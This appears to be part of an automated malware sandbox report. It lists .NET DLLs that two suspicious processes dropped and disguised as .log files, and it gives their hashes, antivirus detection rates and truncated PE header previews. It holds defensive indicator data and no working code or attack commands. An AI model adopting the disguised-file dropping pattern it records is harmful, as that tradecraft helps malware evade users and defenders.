                                                                                                C:\Users\user\Desktop\JwbtnRPV.log

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):33280
                                                                                                Entropy (8bit):5.634433516692816
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\LqKTzAAu.log

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):46592
                                                                                                Entropy (8bit):5.870612048031897
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\NVLRgsWM.log

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):5.645950918301459
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\QdcRcxPi.log

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):33280
                                                                                                Entropy (8bit):5.634433516692816
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\cIDyHnkk.log

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):342528
                                                                                                Entropy (8bit):6.170134230759619
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\eIxzTFKJ.log

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):64000
                                                                                                Entropy (8bit):5.857602289000348
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\hnxxzxgb.log

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):69632
                                                                                                Entropy (8bit):5.932541123129161
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                C:\Users\user\Desktop\htcPaTVC.log

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):89600
                                                                                                Entropy (8bit):5.905167202474779
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                MD5:06442F43E1001D860C8A19A752F19085
                                                                                                SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 16%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                                                                C:\Users\user\Desktop\maPwcuvP.log

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):64000
                                                                                                Entropy (8bit):5.857602289000348
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\mlFoDzaq.log

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):22016
                                                                                                Entropy (8bit):5.41854385721431
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 9%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\qTMMgMAe.log

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):342528
                                                                                                Entropy (8bit):6.170134230759619
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\qeoNTMEG.log

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24576
                                                                                                Entropy (8bit):5.535426842040921
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\vJjMMWBx.log

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):22016
                                                                                                Entropy (8bit):5.41854385721431
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 9%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\vPOensqX.log

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):5.645950918301459
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\xRAMIbuT.log

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24576
                                                                                                Entropy (8bit):5.535426842040921
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\zHJVyCcw.log

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32256
                                                                                                Entropy (8bit):5.631194486392901
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\zIxCDFUn.log

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):33792
                                                                                                Entropy (8bit):5.541771649974822
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 38%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):55
                                                                                                Entropy (8bit):4.306461250274409
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                Malicious:false
                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                C:\Windows\ShellExperiences\de5836ef699499

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:ASCII text, with very long lines (628), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):628
                                                                                                Entropy (8bit):5.881347945042169
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:t9844dUEwQGplBRXTU7jy1DLr+3TDniGVKLPpqWteJoocm2TQkfA9oQHcEzeToL:t9844dGrBRXw7j0LZbpqWjfY9NVzb
                                                                                                MD5:17C3999EC55F50F2E76F350289A46C1A
                                                                                                SHA1:034AFD9B7492693D13B2F84C1B0175D2D56BBC62
                                                                                                SHA-256:579DE4040D7A4301002B90D8B4363E3635A75A4918DFB7CCF5CFAAC50B68AF85
                                                                                                SHA-512:D5D0A8A54F01DA746A8B502B8042324104DA79830D1A1770B0B4313BFC2FBB2B837792C08739278B6A1D1D02E3AC77AEED216F20BD04DF38B9D877003D387621
                                                                                                Malicious:false
